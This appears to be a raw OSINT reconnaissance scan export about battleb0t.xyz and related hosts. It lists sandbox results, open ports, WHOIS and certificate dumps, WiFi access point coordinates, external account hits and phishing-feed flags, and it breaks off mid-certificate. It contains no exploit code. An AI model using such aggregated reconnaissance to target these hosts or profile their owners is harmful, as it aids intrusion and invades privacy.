| 2023-05-12 02:46:35 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://ikerguerrero.dev/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bdc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_bdc_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3036"\n "IsoScope_bdc_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_bdc_IE_EarlyTabStart_0xf40_Mutex"\n "IsoScope_bdc_ConnHashTable<3036>_HashTable_Mutex"\n "IsoScope_bdc_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"\n "142.250.191.74:443"\n "172.64.132.15:443"\n "151.101.1.229:443"\n "142.251.214.131:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ikerguerrero.dev"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ikerguerrero.dev"\n "use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2021 Twitter, Inc." (Indicator: "twitter")\n "<a href="https://www.linkedin.com/in/iguerrerog/" target="_blank"><img class="intro-logo" src="assets/img/logoLinkedin.png"></a>" (Indicator: "linkedin.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FFE.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1FFD.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003220]\n "RXSS1QAB.htm" has type "HTML document ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\RXSS1QAB.htm]- [targetUID: 00000000-00003220]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtaorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25724 version 1.1"- [targetUID: N/A]\n "isokoban_1_.png" has type "PNG image data 1320 x 791 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "9F12WOLK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9F12WOLK.txt]- [targetUID: 00000000-00003036]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvao7CIPrc_1_.woff" has type "Web Open Font Format TrueType length 24716 version 1.1"- [targetUID: N/A]\n "1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjNDrMfJg_1_.woff" has type "Web Open Font Format TrueType length 25428 version 1.1"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25916 version 1.1"- [targetUID: N/A]\n "~DFE3DB26A7977220AD.TMP" has type "data"- Location: [%TEMP%\\~DFE3DB26A7977220AD.TMP]- [targetUID: 00000000-00003036]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvoorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25360 version 1.1"- [targetUID: N/A]\n "1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4cHLDrMfJg_1_.woff" has type "Web Open Font Format TrueType length 25996 version 1.1"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF5B01A6D2E18F9376.TMP" has type "data"- Location: [%TEMP%\\~DF5B01A6D2E18F9376.TMP]- [targetUID: 00000000-00003036]\n "P04A7CBK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P04A7CBK.txt]- [targetUID: 00000000-00003036]\n "cubam_1_.png" has type "PNG image data 1920 x 1080 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "styles_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "GBYF66MA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GBYF66MA.txt]- [targetUID: 00000000-00003220]\n "bandera_mexico_1_.png" has type "PNG image data 2203 x 1240 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "_1D3EFA78-C97D-11ED-A555-08002718A46F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://getbootstrap.com/"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "https://github.com/StartBootstrap/startbootstrap-business-casual/blob/master/LICENSE"\n Pattern match: "https://github.com/twbs/bootstrap/blob/main/LICENSE"\n Pattern match: "https://startbootstrap.com/theme/business-casual"\n Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "C.JgU/0$"\n Pattern match: "https://use.fontawesome.com/releases/v6.1.0/js/all.js"\n Pattern match: "https://www.linkedin.com/in/iguerrerog/"\n Pattern match: "https://play.google.com/store/apps/details?id=com.StickyGames.PLCEmulatorProject"\n Pattern match: "https://fonts.googleapis.com/css?family=Lora:400,400i,700,700i"\n Pattern match: "https://fonts.googleapis.com/css?family=Raleway:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i"\n Pattern match: "https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-MoFoq92mg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjNDrMfJg.woff"\n Pattern match: "MUID06AC37517CFB670117FF258C7DB766BBmsn.com/1025424501094431100936425263449231022473*"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://ikerguerrero.dev/Accept-Language"\n Pattern match: "https://csp.withgoogle.com/csp/apps-themesCross-Origin-Resource-Policy"\n Pattern match: "http://ikerguerrero.dev"\n Pattern match: "http://ikerguerrero.dev/"\n Pattern match: "isdomainmigratedtruewww.msn.com/102584346316831058692425247824231022473*"\n Pattern match: "MUIDB1EE4D163B6736F882F96C3BEB73F6EBEieonline.microsoft.com/9216424501094431100936424779074231022473*"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI6MX1D_JOuGQbT0gvTJPa787weuxJBkqs.woff"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI6MX1D_JOuGQbT0gvTJPa787z5vBJBkqs.woff"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-C0Coq92mg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4bbLDrMfJg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4cHLDrMfJg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4ejLDrMf | 185.199.111.153 |
| 2023-05-12 03:23:38 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.14:8080 | 188.114.96.0/24 |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/css;charset=utf-8 | https://battleb0t.xyz/./src/style.css?4 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-fog.github.io]
https://www.openphish.com/feed.txt | 0-fog.github.io |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_1.jpeg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Gitea - Gitea is a forge software package for hosting software development version control using Git as well as other collaborative features like bug tracking, code review, kanban boards, tickets, and wikis. It supports self-hosting but also provides a free public first-party instance. | battleb0t.github.io |
| 2023-05-12 02:46:02 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 32.8608, -79.9746 | 35.229.48.116 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FD:45:77) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00jew.github.io]
https://www.openphish.com/feed.txt | 00jew.github.io |
| 2023-05-12 03:09:47 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 69.170.74.34.bc.googleusercontent.com | 34.74.170.69 |
| 2023-05-12 02:44:38 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | nuke.battleb0t.xyz |
| 2023-05-12 03:24:21 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 403 | https://ayhu.xyz/lol.html |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 03:37:23 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | Frankfurt Am Main, Germany | 46.101.229.70 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Flipboard (Category: tech)
https://flipboard.com/@login | login |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 34.74.170.74 |
| 2023-05-12 03:22:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.97.1:8080 | 188.114.97.1 |
| 2023-05-12 02:46:53 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | teamcity.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:36:85:4f:53:33:b4:86:64:2a:83:12:ed:95:43:fe:1e:22
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 18:58:42 2023 GMT
Not After : Apr 2 18:58:41 2023 GMT
Subject: CN=teamcity.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:a9:1b:77:20:87:f6:da:b4:e6:55:f1:15:61:14:
5d:d5:64:2e:1b:95:d0:fa:42:f5:c5:a3:6e:02:4b:
41:fb:df:35:0c:b5:28:23:7f:95:78:79:7a:ae:1b:
33:21:14:1a:cf:54:dc:ad:7c:ad:0e:d0:0d:13:24:
ac:b2:17:d0:67:2e:56:2e:b6:b0:fc:48:83:bd:01:
86:52:7b:96:4e:60:82:98:48:6b:33:90:dc:af:7a:
0e:ed:26:47:56:e9:2a:9b:55:f7:eb:69:7f:53:8a:
65:d2:d9:9f:8e:b4:d7:c2:d1:e2:bc:27:0e:51:4c:
6a:50:43:bf:f3:eb:93:79:c5:c0:01:20:e4:3f:17:
e9:46:96:6a:c9:c7:d3:3a:19:6a:20:08:fd:61:d6:
98:cf:84:d5:28:4b:ee:2d:d4:11:0b:36:29:51:b8:
23:d5:73:76:da:70:98:bf:4f:33:c0:fe:34:a0:ab:
09:05:a6:dc:26:b2:66:b1:51:b6:f2:4f:d9:92:3a:
c0:21:8b:2a:63:52:83:3f:e9:e2:13:c0:c2:c9:2d:
d5:e5:7e:fd:90:7e:37:42:6b:b9:54:b1:2f:9b:98:
24:d8:0b:1b:69:e7:d3:08:0e:71:57:e8:1a:67:a6:
92:84:48:3f:fc:46:40:41:65:20:38:c9:7e:99:04:
34:72:9a:a0:65:84:01:2f:31:b1:86:06:22:39:91:
0a:ee:bd:30:20:85:c5:8d:5b:4e:77:39:ae:9b:09:
06:f6:07:9d:dd:2d:ba:92:b9:4a:fe:af:b4:b2:6a:
1c:46:10:aa:88:c3:34:ab:7b:51:a7:88:62:ff:6f:
89:37:e0:83:c3:40:7b:7e:a8:e9:d2:e9:e0:68:ff:
51:7e:4a:c3:4d:57:60:55:c2:2c:5e:84:55:31:0d:
f9:06:48:b8:fd:a5:13:e0:6d:e6:16:0e:03:58:98:
01:6a:9c:dd:37:75:36:74:a0:0e:9a:ed:4d:d0:b0:
57:3c:8d:0d:2e:93:98:3c:31:25:01:37:1f:57:7e:
ef:84:b5:c0:04:9b:56:77:f4:78:da:7b:d3:51:11:
80:33:d3:18:83:ee:96:99:02:db:e7:fd:22:71:5a:
7f:e7:e3:95:25:33:c7:56:7f:0d:59:30:dc:3e:03:
7d:f0:6b:ae:f9:f9:7c:ad:ec:ad:62:73:0e:7f:47:
4e:2a:02:fd:df:82:83:00:62:ec:61:18:4d:70:9d:
bd:b9:85:be:c1:ed:b1:f9:61:e0:dc:70:d2:b3:0d:
be:23:ab:b6:3a:43:ae:fe:c3:d3:cf:08:6c:c7:33:
70:eb:d2:70:df:6f:ce:26:37:4c:eb:f9:4f:c2:58:
32:f9:79
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
02:C9:94:28:32:1B:B1:2F:E4:C4:4F:88:0E:4C:57:09:73:5A:37:AF
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:teamcity.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Jan 2 19:58:42.072 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:C3:06:C6:C9:50:41:7A:D7:6C:70:98:
51:7B:09:5D:89:5F:4F:70:26:E1:F3:55:05:EB:4B:EB:
4E:9B:F0:F2:88:02:20:0D:25:66:1C:2B:B5:DD:05:53:
30:99:F3:B4:0E:BD:C7:CD:B0:F0:5C:10:43:36:86:5F:
33:1B:1F:4F:B8:11:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 2 19:58:42.586 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:B0:57:94:1E:8F:52:58:AA:CA:03:15:
81:F7:97:21:F9:28:45:54:DF:F1:77:F6:A5:EC:58:76:
D4:E4:12:AD:72:02:20:01:EE:79:67:15:46:B5:E0:30:
01:5F:EC:EA:1F:02:05:AC:32:1E:71:83:9E:36:A7:78:
3E:88:36:4C:5A:59:65
Signature Algorithm: sha256WithRSAEncryption
00:08:62:12:2d:66:22:5c:b5:95:b3:65:a0:38:13:b2:e8:94:
fc:c1:f0:43:eb:c7:1d:b0:f8:81:fa:e3:8a:ff:5b:71:ba:c9:
f0:8c:f7:2d:1c:f7:06:60:a9:cc:2b:a3:6a:74:56:5c:cc:ee:
dd:59:f1:89:1a:b3:64:77:7a:c3:42:25:ce:6f:ac:00:39:8c:
a8:ce:ab:de:74:9d:af:21:0a:8f:b8:da:c8:3a:34:04:13:53:
15:9a:a4:d4:ed:01:76:22:4f:b2:ec:9f:6d:03:d3:fa:18:6c:
67:6c:d6:b6:ce:7c:21:a4:1d:31:9c:0b:67:28:45:a7:ef:50:
97:79:ef:ba:a7:08:97:43:77:c8:c9:14:ff:92:90:23:36:be:
38:39:aa:a3:93:44:43:ea:01:c8:6f:d8:16:59:02:23:ab:26:
37:6a:12:88:93:b7:fe:c2:0d:03:0c:53:22:d8:37:25:ad:01:
bc:05:a2:c1:63:10:a5:01:dc:4e:2b:3f:07:57:03:2b:c0:d6:
50:e4:e1:65:6d:4b:fd:e0:d9:56:40:77:bf:53:f8:f8:15:43:
95:2f:e5:cc:d5:7e:3a:08:ae:5e:a2:25:e0:3f:95:7a:61:d1:
0e:7f:79:5b:19:24:0a:bf:5f:bd:78:ba:c9:ea:6b:b8:bc:16:
32:d8:03:9b
|
| 2023-05-12 03:24:21 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU |
| 2023-05-12 03:41:36 | Physical Coordinates | No | AbstractAPI | 100 | 0 | 3 | 0 | None | 50.8897, 6.0563 | 45.131.109.53 |
| 2023-05-12 03:16:29 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'HE', u'country_tld': u'.de', u'ip': u'46.101.229.70', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 82927922, u'country_code': u'DE', u'timezone': u'Europe/Berlin', u'city': u'Frankfurt am Main', u'network': u'46.101.192.0/18', u'languages': u'de', u'version': u'IPv4', u'latitude': 50.113381, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Germany', u'country_capital': u'Berlin', u'org': u'DIGITALOCEAN-ASN', u'postal': u'60311', u'asn': u'AS14061', u'country': u'DE', u'region': u'Hesse', u'longitude': 8.671931, u'country_calling_code': u'+49', u'country_area': 357021.0, u'country_code_iso3': u'DEU'} | 46.101.229.70 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | Domain Names REG.RU LLC | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AGTLinksys (Net ID: 00:0C:41:75:B6:62) | 39.0469, -77.4903 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BeensGroep (Net ID: 00:01:21:1F:B1:90) | 52.3759, 4.8975 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | PHILIPS_B81A7F (Net ID: 00:0B:3B:D9:1B:59) | 50.8897, 6.0563 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT639BrM3 (Net ID: 38:3B:C8:ED:A2:0A) | 37.751, -97.822 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Pokerstrategy (Category: gaming)
http://www.pokerstrategy.net/user/login/profile/ | login |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | 00rz.com | 00rz.com |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Blogspot (Category: blog)
http://Altpapier.blogspot.com | Altpapier |
| 2023-05-12 03:03:34 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00feng00.github.io |
| 2023-05-12 02:46:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
